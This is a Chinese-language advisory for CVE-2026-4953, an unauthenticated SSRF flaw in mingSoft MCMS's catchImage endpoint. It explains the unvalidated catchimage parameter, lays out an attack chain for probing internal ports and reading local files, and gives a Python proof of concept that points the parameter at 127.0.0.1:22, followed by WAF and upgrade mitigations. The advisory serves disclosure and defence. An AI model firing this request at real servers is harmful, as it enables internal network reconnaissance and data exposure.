CVE-2026-4953: mingSoft MCMS 服务端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-4953

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

mingSoft MCMS

漏洞概述

mingSoft MCMS 5.5.0及之前版本被发现存在服务器端请求伪造（SSRF）漏洞。该问题源于组件Editor Endpoint文件net/mingsoft/cms/action/BaseAction.java中的catchImage函数。攻击者可以通过操纵catchimage参数发起攻击，导致服务器端发起恶意请求。由于该漏洞无需认证且无需用户交互即可远程利用，攻击者可能借此探测内网服务或读取敏感资源，对系统的机密性、完整性和可用性造成影响。目前相关利用代码已公开。

技术细节

该漏洞存在于mingSoft MCMS的内容管理系统中，具体出现在图片抓取功能的实现逻辑中。在`net/mingsoft/cms/action/BaseAction.java`文件的`catchImage`方法内，程序直接接收用户通过HTTP请求传递的`catchimage`参数，并将其作为目标URL进行资源请求，而未对该参数的值进行严格的校验或过滤（例如未限制目标IP为内网地址或未限制协议类型）。攻击者可以利用这一缺陷构造恶意的URL参数。由于系统未对请求发起者的身份进行验证（PR:N），且无需用户交互（UI:N），攻击者可以向受影响的端点发送特制的HTTP请求。这使得服务器端应用程序代替攻击者去访问攻击者指定的内网或外网资源。利用此漏洞，攻击者可能探测内网端口、结合其他协议读取本地文件或对内网其他服务发起攻击。CVSS 3.1评分为7.3，属于高危漏洞。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别出互联网上运行mingSoft MCMS <= 5.5.0的目标系统，并确认其Editor Endpoint接口可访问。

STEP 2

步骤2：漏洞利用

攻击者向`catchImage`接口发送特制的HTTP GET请求，在`catchimage`参数中填入内网地址（如127.0.0.1）或受攻击者控制的URL。

STEP 3

步骤3：服务端请求

服务器端解析请求，未做过滤便向攻击者指定的目标发起连接，导致SSRF。

STEP 4

步骤4：后果达成

攻击者根据响应时间或内容差异判断内网端口状态，或利用协议支持读取本地文件，进一步渗透内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target-ip:port/"

# The vulnerable endpoint path might vary based on deployment, 
# typically accessed via the controller mapping.
# Based on the file structure BaseAction.java, constructing the request.
exploit_endpoint = f"{target_url}/ms/cms/action/catchImage.do"

# Malicious payload to demonstrate SSRF (e.g., accessing localhost)
# Modify the URL to point to an internal resource (e.g., http://127.0.0.1:8080)
payload = {
    "catchimage": "http://127.0.0.1:22"
}

try:
    print(f"Sending SSRF request to: {exploit_endpoint}")
    response = requests.get(exploit_endpoint, params=payload, timeout=10)
    
    # Analyzing response to confirm vulnerability
    if response.status_code == 200:
        print("[+] Request sent successfully. Check response for signs of internal interaction.")
        print("Response Headers:", response.headers)
        # If the internal service returns distinct content, it would appear here.
        print("Response Content Snippet:", response.text[:200])
    else:
        print(f"[-] Server returned status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[!] Error occurred: {e}")

影响范围

mingSoft MCMS <= 5.5.0

防御指南

临时缓解措施

建议立即检查系统版本并进行升级。如果暂时无法升级，应在应用防火墙（WAF）上添加规则，阻断针对`catchImage.do`或相关路径的请求参数中包含IP地址或特殊字符的流量，或者直接在业务层暂时禁用该图片远程抓取功能以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4953
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4953
3 Details https://www.cvedetails.com/cve/CVE-2026-4953/
4 VulDB https://vuldb.com/cve/CVE-2026-4953
5 Link https://github.com/wing3e/public_exp/issues/3
6 Link https://vuldb.com/?ctiid.353831
7 Link https://vuldb.com/?id.353831
8 Link https://vuldb.com/?submit.777516